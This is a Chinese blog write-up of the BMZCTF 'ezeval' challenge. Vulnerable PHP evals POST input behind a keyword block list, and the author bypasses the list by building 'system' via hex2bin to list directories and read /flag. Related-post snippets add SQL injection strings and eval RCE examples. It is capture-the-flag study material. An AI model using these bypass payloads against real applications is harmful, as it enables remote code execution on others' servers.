BMZCTF WEB_ezeval

最新推荐文章于 2022-07-19 20:19:09 发布
最新推荐文章于 2022-07-19 20:19:09 发布
阅读量162 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lay_breeze/article/details/119805585
版权

BMZCTF WEB_ezeval
记一次做题思路

<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?>

分析源码

首先需要使用POST方法传递参数(用HackBar插件)

然后注意到里面两个函数htmlspecialchars()和str_ireplace()

1、htmlspecialchars()把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体;
2、str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。
在这里插入图片描述

搞清楚函数大致就懂了整个php的作用
用POST方式传递cmd的値,接着将cmd的値转换成HTML,然后设置黑名单,对于触发了黑名单的字符串,把它们替换成BMZCTF,最后再调用eval执行替换后的命令。

对于这种题,我首先想到用system(‘ls’)看一下所有目录文件,但是system在黑名单里,想办法绕过去。

百度之后,发现可以用hex2bin()函数。
system十六进制为73797374656d

cmd=hex2bin('73797374656d')('ls -l /');

绕过之后得到整个目录
在这里插入图片描述
发现了flag文件

cmd=hex2bin('73797374656d')('cat /flag');

在这里插入图片描述
得到falg BMZCTF{15f365a946864ff5a48f2a7be7f77547}

lay_breeze
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf逆向解题——re1-附件资源
03-02
ctf逆向解题——re1-附件资源
BMZCTF_WEB_ezeval
Kobalos的博客
09-24 191
查看代码 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','in.
Dest0g3 520迎新赛web&misc
最新发布
weixin_63231007的博客
07-19 1277
Destog3 520迎新赛web&misc题目复现
第一届BMZCTF公开赛-WEB-Writeup
末初的CSDN博客
12-30 3837
文章目录ezevalezphppenetrationBMZ_Market 前言 首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初 以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正 ezeval <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_li
end 21-4-19
qq_45781155的博客
04-19 148
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla
ctf刷题小结
quan9i的博客
05-15 6029
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
BMZCTF内存取证三项.zip
10-21
1.小黑写的啥,据说是flag? 2.那么问题来了,小白的密码是啥? 3.小黑发送的机密文件里面到底是什么
2020祥云杯 CTFNu1L.pdf
03-15
2020祥云杯 CTF WP 高清PDF版
androidpn 消息推送 服务器端源码
08-10
androidpn 消息推送 服务器端源码 可以自己修改也可以直接启动运行 包含web的管理页面 最全面的android消息推送服务端程序
2021暨南大学CTF新生杯(Web篇)
恒Keep毅
12-03 4597
目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行?我该怎么绕过读取文件呢?【3星?
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”
Ho1aAs‘s Blog
07-23 8733
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习
break_cat的博客
11-17 1688
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习 背景:上周末参加了BMZCTF的渗透测试公开赛,比赛是解BMZCTF靶场中综合渗透的一道题,比赛后官方发了WP,跟着做了一遍,出现了一些问题,写出来抛砖引玉,求指导。 思路:1.官方预期解法(这……我做出来的和解法效果不一样,求大佬指点)            2.非预期解法——广州航海学院 HhhM(成功,感谢HhhM大佬的思路,学习了) &nb
BMZCTF:2020sdnisc-损坏的流量包
末初的CSDN博客
12-14 544
http://bmzclub.cn/challenges#2020sdnisc-%E6%8D%9F%E5%9D%8F%E7%9A%84%E6%B5%81%E9%87%8F%E5%8C%85 1.pcapng无法使用wireshark打开 可能破坏了pcapng的文件结构,但是应该不会破坏数据内容,尝试使用foremost看看能不能从这个数据包中分离出什么东西 得到一个zip压缩包,解压得到key.txt ZmxhZ3tzZG5pc2NfbmV0X3NRMlgzUTl4fQ== PS C:\User
第一届BMZCTF公开赛-MISC-Writeup
末初的CSDN博客
12-28 5961
文章目录Tiga Tiga vim查看tiga.txt发现存在零宽度字符 零宽度字符隐写在线站:https://yuanfux.github.io/zero-width-web/ 得到misc.zip密码:GiveTiGaGuang! 迪迦.jpg文件尾附加了youcanalso.zip的密码信息 file.zip的密码很明显需要通过爆破这些密码片段文件的CRC得到内容 爆破脚本如下: import binascii import string def crack_crc(): print
BMZCTF:哆啦A梦
末初的CSDN博客
01-14 1059
http://bmzclub.cn/challenges#%E5%93%86%E5%95%A6A%E6%A2%A6 对图片binwalk分析发现附加了另外一张png图片 这张png是一张底部被截掉了一部分的二维码,使用010 Editor打开后明显有CRC不匹配报错,修改高度补全二维码 补全后,扫描 PS C:\Users\Administrator\Desktop> php -r "var_dump(base64_decode('ZmxhZ3tDdGZfMjAxOF92ZXJ5X2dvb2
[BJDCTF2020]EzPHP
feng的博客
12-27 1341
知识点 base32 url编码绕过 preg_match在非/s模式下的绕过 $_POST和$_GET的优先级 PHP伪协议。 sha1函数的数组绕过。 create_function()的代码注入 WP 这个题目真的挺难的,尤其是最后的create_function代码注入,整个题目的考点太多,真的就是看学的扎实不扎实了,是一道非常好的题目。 首先进入环境,f12发现: 比较明显的base32,解码后得到1nD3x.php。访问一下,可以得到源码: <?php highlight_file(
[BMZCTF]-WEB_ezeval
cjdgg的博客
05-14 181
[BMZCTF]-WEB_ezeval 这题也是直接给出php源代码,代码也很直接,只要我们将数据绕过htmlspecialchars()和str_ireplace()就可以执行传入的cmd htmlspecialchars() 函数:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 str_ireplace() 函数:str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。 简单来说,这题考察的就是黑名单的绕过,这里直接推荐mochu大佬的文章 第
BMZCTF Web up
qq_26243045的博客
01-14 308
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。
BUUCTF:[网鼎杯 2020 朱雀组]phpweb
qq_46230755的博客
12-17 583
拿到题目访问一下,发现页面会自动刷新 所以我们抓一下包 很明显date是一个php的函数,而p是其中的一个参数,表示输出时间。 因此我们可以执行一下eval函数 很明显,被拦了。这时候我们可以考虑一下读取index.php的源码 利用highlight_file函数 func=highlight_file&p=index.php 得到 完整源码 <!DOCTYPE html> <html> <head> <title>phpweb.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值